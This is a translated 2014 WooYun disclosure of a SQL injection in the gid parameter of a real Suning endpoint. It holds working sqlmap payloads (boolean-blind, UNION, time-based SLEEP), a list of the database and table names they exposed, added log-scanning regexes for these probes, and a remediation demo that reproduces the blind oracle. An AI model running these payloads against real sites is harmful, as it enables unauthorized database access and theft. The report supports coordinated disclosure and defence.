
Vulnerability summary

Defect ID: wooyun-2014-060063

Title: SQL injection vulnerability at a Suning endpoint # root privileges

Vendor: Jiangsu Suning.com E-Commerce Co., Ltd. (江苏苏宁易购电子商务有限公司)

Author: U神

Submitted: 2014-05-09 17:13

Fixed: 2014-06-23 17:14

Disclosed: 2014-06-23 17:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-05-09: Details sent to the vendor; awaiting vendor action
2014-05-09: Vendor confirmed; details visible to the vendor only
2014-05-19: Details disclosed to core white hats and domain experts
2014-05-29: Details disclosed to regular white hats
2014-06-08: Details disclosed to intern white hats
2014-06-23: Details disclosed to the public

Brief description:

SQL injection vulnerability at a Suning endpoint # root privileges

Detailed description:

Injection point:

http://app.suning.com/softwarelist.php?gid=4&cid=190


Injectable parameter: gid

[Screenshot: 1.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=4 AND 4558=4558&cid=190
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: gid=4 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6274773a,0x5742515 36c4671566759,0x3a7566613a), NULL, NULL#&cid=190
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: gid=4 AND SLEEP(5)&cid=190
---
[17:08:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[17:08:16] [INFO] fetching database names
[17:08:16] [WARNING] reflective value(s) found and filtering out
available databases [6]:
[*] information_schema
[*] suning
[*] suning_app_inner
[*] suning_ios
[*] suning_win
[*] test
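The three payload shapes sqlmap lists above (a boolean condition appended to an integer, a UNION SELECT, and a SLEEP call) are easy to spot in web-server access logs after the fact. The following is an added example, not part of the original report: it parses constructed nginx-style log lines (fake IPs, timestamps and user agents), URL-decodes each query parameter, and flags the same three patterns on any parameter. The patterns are deliberately narrow to keep false positives low; a production rule set would be broader.

```python
"""Flag the three injection probe shapes from the sqlmap output in access logs.

Added example; not code from the WooYun report or from Suning. The log lines
below are constructed to mimic nginx 'combined' format, with fake addresses.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample log: one normal request, three probes on gid, one normal request.
SAMPLE_LOG = """\
10.0.0.1 - - [09/May/2014:17:08:10 +0800] "GET /softwarelist.php?gid=4&cid=190 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.2 - - [09/May/2014:17:08:12 +0800] "GET /softwarelist.php?gid=4%20AND%204558%3D4558&cid=190 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
10.0.0.2 - - [09/May/2014:17:08:14 +0800] "GET /softwarelist.php?gid=4%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL%23&cid=190 HTTP/1.1" 200 812 "-" "sqlmap/1.0"
10.0.0.2 - - [09/May/2014:17:08:16 +0800] "GET /softwarelist.php?gid=4%20AND%20SLEEP(5)&cid=190 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
10.0.0.3 - - [09/May/2014:17:09:00 +0800] "GET /softwarelist.php?gid=7&cid=190 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

# Minimal parser for the nginx 'combined' format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# One signature per probe type seen in the sqlmap output above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),   # gid=4 AND 4558=4558
    "union-select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),   # UNION ALL SELECT ...
    "time-blind": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),          # AND SLEEP(5)
}


def scan_query(path: str) -> dict:
    """Return {parameter: [matching signature names]} for a request path."""
    query = urlsplit(path).query
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote_plus(value)  # second decode catches double-encoded probes
        found = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if found:
            hits[name] = found
    return hits


def scan_log(text: str) -> list:
    """Return one (client_ip, parameter, signatures) tuple per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for param, sigs in scan_query(m["path"]).items():
            alerts.append((m["ip"], param, sigs))
    return alerts


if __name__ == "__main__":
    for ip, param, sigs in scan_log(SAMPLE_LOG):
        print(f"{ip} probed parameter {param!r}: {', '.join(sigs)}")
```

Run against the sample, the scanner reports three hits from 10.0.0.2, all on gid, and nothing for the two ordinary requests; the "total of 0 HTTP(s) requests" line in the sqlmap output is an artefact of sqlmap resuming from its session file, so the real probe traffic will be in the logs.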

Proof of vulnerability:

Database: suning
[233 tables]
+--------------------------+
| Permission |
| action |
| activity |
| ad_indexfocus_img |
| ad_indexsoft |
| admin_group |
| admin_module |
| admin_promotion |
| admin_user |
| admin_user_new |
| app_client |
| app_count_app_day |
| app_count_app_hour |
| app_count_detail |
| app_count_device_day |
| app_count_mobile_day |
| app_count_user_day |
| app_device |
| app_imei |
| app_push_apps |
| app_push_log |
| app_software |
| app_sys |
| app_sys_cmd |
| app_temp |
| authorize |
| brand_ext_inner_map |
| brand_external |
| brand_mobile_ext |
| brand_model_map |
| bug_word |
| category |
| category_anzhi |
| category_icon |
| cloud_bootscreen |
| cloud_qrcode_statistics |
| cloud_res |
| ctrl |
| ctrl_copy |
| ctrltype |
| ctrltype_copy |
| department |
| developer |
| developer_appeal |
| developer_msg |
| device_info |
| device_statistics |
| district_day |
| district_hour |
| district_month |
| district_tol |
| district_week |
| down_detail |
| download |
| download_all |
| download_day |
| download_hour |
| download_month |
| download_tol |
| download_week |
| ego_ad_indexfocus_img |
| ego_ad_indexsoft |
| favority |
| feedback |
| feedback_detail |
| friend_links |
| game_ad_indexfocus_img |
| game_ad_indexsoft |
| game_download_all |
| game_download_day |
| game_download_hour |
| game_download_month |
| game_download_tol |
| game_guess |
| game_soft_ranking |
| game_topic |
| game_topic_info |
| group |
| guess |
| h5_category |
| h5_download_day |
| h5_download_hour |
| h5_download_month |
| h5_download_tol |
| h5_maintain_soft |
| h5_soft_tag |
| h5_software |
| h5_tag |
| http_log |
| imei_day |
| imei_hour |
| imei_month |
| imei_tol |
| install_day |
| install_hour |
| install_month |
| install_tol |
| install_week |
| ip_visit |
| keyword |
| list_column |
| log |
| logo_icon |
| manager |
| market |
| market_ad |
| market_cate |
| market_channel |
| market_channel_day |
| market_imei_channel |
| mobile_brand |
| model_drive |
| model_feedback |
| msg |
| msg_forbid |
| news |
| news_app_map |
| news_class |
| news_comment |
| order_soft |
| os_day |
| os_hour |
| os_month |
| os_tol |
| os_week |
| outer_category |
| page_ad_indexfocus_img |
| people_need |
| people_recommend |
| privilege |
| push_id |
| push_software |
| qrcode_channel |
| qrcode_channel_bak |
| qrcode_channel_url |
| qrcode_channel_url_bak |
| quick_entry |
| ratio_day |
| ratio_hour |
| ratio_month |
| ratio_tol |
| ratio_week |
| recommend |
| report |
| role_user |
| score |
| search_day |
| search_keywords |
| search_month |
| search_soft |
| search_soft_bak20140417 |
| search_tol |
| search_week |
| sms_statistics |
| sn_software |
| soft_guess |
| soft_ranking |
| soft_tag |
| soft_ver_log |
| software |
| software_bak20131017 |
| software_copy |
| software_log |
| software_log_copy |
| software_permission |
| software_pool |
| software_safe |
| spread_money |
| spread_operation |
| spread_promotion_goods |
| spread_promotion_setting |
| spread_reward |
| spread_soft_count_day |
| spread_software |
| spread_supplier |
| suit_feedback |
| suit_statistics |
| suit_statistics_day |
| suit_statistics_hour |
| suit_statistics_month |
| suit_version |
| suning_district |
| suning_store |
| suning_user |
| supplier |
| sys_ad |
| sys_ad_stat |
| sys_ad_stat_day |
| sys_brand |
| sys_brand_info |
| sys_cate |
| sys_soft |
| sys_topic |
| sys_topic_info |
| sys_word |
| tag |
| tag_app_map |
| temporary |
| term_district_day |
| term_district_hour |
| term_district_month |
| term_district_tol |
| term_imei |
| term_imei_day |
| term_imei_hour |
| term_imei_month |
| term_imei_tol |
| term_install |
| term_install_old |
| term_install_testlog |
| term_model_day |
| term_model_hour |
| term_model_month |
| term_model_tol |
| term_os_day |
| term_os_hour |
| term_os_month |
| term_os_tol |
| term_ratio_day |
| term_ratio_hour |
| term_ratio_month |
| term_ratio_tol |
| term_stat_by_imei_day |
| term_stat_by_pack |
| term_stat_by_pack_model |
| topic |
| topic_info |
| updatesoft_log |
| verify_reason |
| web |
| web_ad |
| web_notice |
| web_tag |
+--------------------------+

Remediation:

Copyright: please credit the source when reposting: U神@WooYun
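The report leaves the remediation section empty. As an added example, not code from the report or from Suning's softwarelist.php (whose real schema is unknown), the following shows why an integer parameter like gid becomes a boolean-based blind oracle when it is pasted into the SQL text, and the two-part fix: strict input validation plus a parameterized query. The software table and its rows are constructed, and SQLite stands in for MySQL, so only the boolean-based payload from the sqlmap output is exercised; the UNION and SLEEP payloads depend on MySQL syntax.

```python
"""Concatenated vs. parameterized lookup on the gid parameter.

Added example; not code from the WooYun report or from Suning. The table and
rows are constructed, and SQLite stands in for the MySQL back end.
"""
import re
import sqlite3

INT_RE = re.compile(r"[0-9]+")  # plain decimal digits only, no sign, no whitespace


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE software (
            id INTEGER PRIMARY KEY, name TEXT, gid INTEGER, cid INTEGER);
        INSERT INTO software VALUES
            (1, 'app-a', 4, 190), (2, 'app-b', 4, 190), (3, 'app-c', 7, 190);
        """
    )
    return conn


def list_software_vulnerable(conn, gid: str, cid: str) -> list:
    """Vulnerable pattern: request values pasted into the SQL string.
    Whatever arrives in gid becomes part of the WHERE clause, which is exactly
    the boolean-based condition sqlmap reported (gid=4 AND 4558=4558)."""
    sql = f"SELECT name FROM software WHERE gid={gid} AND cid={cid} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_software_parameterized(conn, gid: str, cid: str) -> list:
    """Binding alone: the driver sends gid/cid as values, never as SQL text.
    In SQLite the probe string is compared as text to the integer column and
    matches nothing; MySQL would coerce its leading '4' and return the normal
    rows with a truncation warning. Either way, no SQL is injected."""
    sql = "SELECT name FROM software WHERE gid=? AND cid=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (gid, cid))]


def list_software_fixed(conn, gid: str, cid: str) -> list:
    """Hardened pattern: validate the type up front, then bind.
    Validation turns a probe into a clean 4xx instead of a silently empty page,
    which also keeps the attempt visible in application logs."""
    if not (INT_RE.fullmatch(gid) and INT_RE.fullmatch(cid)):
        raise ValueError("gid and cid must be decimal integers")
    sql = "SELECT name FROM software WHERE gid=? AND cid=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (int(gid), int(cid)))]


def blind_oracle_demo(conn) -> dict:
    """Reproduce the oracle sqlmap relied on: a true condition yields the normal
    listing, a false one an empty listing, while the fixed handler refuses both."""
    true_probe, false_probe = "4 AND 4558=4558", "4 AND 4558=4559"
    result = {
        "vulnerable_true": list_software_vulnerable(conn, true_probe, "190"),
        "vulnerable_false": list_software_vulnerable(conn, false_probe, "190"),
        "parameterized_true": list_software_parameterized(conn, true_probe, "190"),
    }
    try:
        list_software_fixed(conn, true_probe, "190")
        result["fixed"] = "accepted"
    except ValueError:
        result["fixed"] = "rejected"
    return result


if __name__ == "__main__":
    for key, value in blind_oracle_demo(make_db()).items():
        print(f"{key}: {value}")
```

The difference between the two vulnerable results (two rows versus none) is the single bit of information each blind request leaks; the fixed handler never reaches the database for malformed input, and even the binding-only variant gives the same answer for both probes, so there is nothing left to infer. The same applies to cid, which should be validated the same way even though sqlmap did not flag it.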


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-05-09 18:06

Vendor reply:

Thank you for your attention to Suning.com; we are arranging staff to fix this vulnerability.

Latest status:

None yet